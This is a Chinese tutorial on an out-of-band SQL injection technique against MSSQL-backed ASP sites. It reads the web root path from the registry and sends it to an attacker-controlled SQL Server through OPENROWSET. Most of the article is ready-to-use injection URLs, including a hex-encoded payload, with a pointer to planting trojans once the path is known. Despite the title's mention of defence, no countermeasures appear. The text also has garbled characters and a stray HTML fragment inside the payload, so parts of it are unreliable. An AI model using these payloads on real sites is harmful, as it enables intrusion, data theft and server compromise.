跨站式SQL注入數(shù)據(jù)庫(kù)攻擊和防范技巧

    前一階段，在嘗試攻擊一個(gè)網(wǎng)站的時(shí)候，發(fā)現(xiàn)對(duì)方的系統(tǒng)已經(jīng)屏蔽了錯(cuò)誤信息，用的也是普通的帳號(hào)連接的數(shù)據(jù)庫(kù)，系統(tǒng)也是打了全部的補(bǔ)丁這樣要攻擊注入是比較麻煩的。因此我自己搞了一種“跨站式SQL注入”。

　　思路如下，既然你不顯示錯(cuò)誤信息，我能不能讓你顯示到別的地方呢？讓SQL把錯(cuò)誤寫(xiě)入別的地方。

　　既然是研究階段，我們最好不要直接注入網(wǎng)站，而是首先用查詢分析器來(lái)分析這個(gè)方法。

　　第一個(gè)想法： 　　

　　SQL可以連接外部的數(shù)據(jù)庫(kù)。 　　

　　于是，首先用查詢分析器，登陸到我自己的一個(gè)虛擬主機(jī)的數(shù)據(jù)庫(kù)（這樣的權(quán)限比較�。�，然后在本地啟動(dòng)一個(gè)SQL server，并且用SA的身份在SQL事件探測(cè)器里邊建立一個(gè)跟蹤。 　

　　嘗試 sp_addlinkedserver 如果成功，那就和操作本地?cái)?shù)據(jù)庫(kù)一樣了。 　

　　提示必須是sysadmin的身份。。失敗�！�

　　換一個(gè)思路：

　　只要你SQL敢發(fā)命令過(guò)來(lái)，我不管執(zhí)行的結(jié)果怎么樣，只要接獲到命令就可以了。 　

　　于是考慮到一個(gè)權(quán)限要求不是很高的命令：OPENROWSET 來(lái)跨服務(wù)器查詢。這個(gè)命令作用是把一個(gè)數(shù)據(jù)庫(kù)命令發(fā)給遠(yuǎn)程的數(shù)據(jù)庫(kù)，取回來(lái)結(jié)果集。。于是就啟動(dòng)“事件跟蹤”監(jiān)視發(fā)過(guò)來(lái)的命令。 　

　　第一次嘗試，首先還是執(zhí)行 create table [dbo].[laokai]([cha8][char](255))--建立一個(gè)表。隨后是把路徑寫(xiě)入數(shù)據(jù)庫(kù)，這里我考慮，直接生成一個(gè)跨庫(kù)的腳本算了。好方便執(zhí)行。。

DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

　　這段代碼什么意思哪？就是把網(wǎng)站的路徑信息寫(xiě)入數(shù)據(jù)庫(kù)。也不是單純的寫(xiě)，寫(xiě)得同時(shí)構(gòu)造一個(gè)SQL語(yǔ)句，這個(gè)語(yǔ)句的執(zhí)行結(jié)果是給laokai這個(gè)數(shù)據(jù)庫(kù)的cha8字段增加了這樣的一行記錄。 　

SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a

　　
　　其中的C:\Inetpub,,1就是注冊(cè)表記錄的根目錄,最后要做的是:

DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--

　
　　這樣就等于執(zhí)行了

SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a

　　這一條語(yǔ)句，同時(shí)你會(huì)在事件探測(cè)器那邊會(huì)顯示 　

SELECT * FROM pubs.dbo.authors where au_fname='C:\Inetpub,,1'

　　　
　　其中的C:\Inetpub 就是網(wǎng)站的路徑。。調(diào)試成功。。 　

　　現(xiàn)在進(jìn)入實(shí)戰(zhàn)階段。某網(wǎng)站屏蔽了全部出錯(cuò)信息。但是我們可以確定它存在注入點(diǎn) a.asp?id=1,怎么做呢？

a.asp?id=1;create table [dbo].[laokai]([cha8][char](255))--

　　
　　返回正常,我們建立了一個(gè)叫l(wèi)aokai的表，有個(gè)字段叫cha8,然后:

a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

　　
　　出錯(cuò)了......出錯(cuò)信息被屏蔽了......怎么辦？經(jīng)過(guò)研究發(fā)現(xiàn)是里邊的某些字符例如 +號(hào)需要轉(zhuǎn)化成16進(jìn)制，或許還有別的地方要轉(zhuǎn)化......怎么辦��？

　　于是寫(xiě)了一個(gè)ASCII轉(zhuǎn)化16進(jìn)制的工具，把全部的代碼轉(zhuǎn)化一下，然后注入就OK了。（工具的下載地址 http://www.cha8.com/ascii.rar 麻煩放入光盤，不要讓他們下，我的服務(wù)器受不了）,最后自然是執(zhí)行上述語(yǔ)句了。
　　

a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20% 6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48% 49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%4F%4E%54%52%4F%4C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33% 53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%20%2C%40%72% 65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29% 20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27% 53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53% 45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75% 5F%66%6E%61%6D%65%3d/33.shtml' target='_blank' class='article'>3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20% 2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20

　　執(zhí)行成功。

a.asp?id=1;DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--

　　網(wǎng)站那邊顯示還是正常頁(yè)面。。但是你這邊的事件探測(cè)器那邊會(huì)顯示:

　
　　注入成功。。后邊知道了絕對(duì)路徑，如何添加木馬的文章就很多了。。這里就不再描述了。。

　　最后說(shuō)明一下：這只是一個(gè)新型的攻擊思路的講解，讓大家通過(guò)另外一種方式把數(shù)據(jù)庫(kù)里邊的數(shù)據(jù)取出來(lái)。。

　　''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' 部分，修改成insert把數(shù)據(jù)加入數(shù)據(jù)庫(kù)也應(yīng)該沒(méi)有問(wèn)題。。甚至單獨(dú)保留 @result 都沒(méi)問(wèn)題。。不過(guò)這樣那邊會(huì)出錯(cuò)。這邊就留下一個(gè)exec 'C:\Inetpub,,1'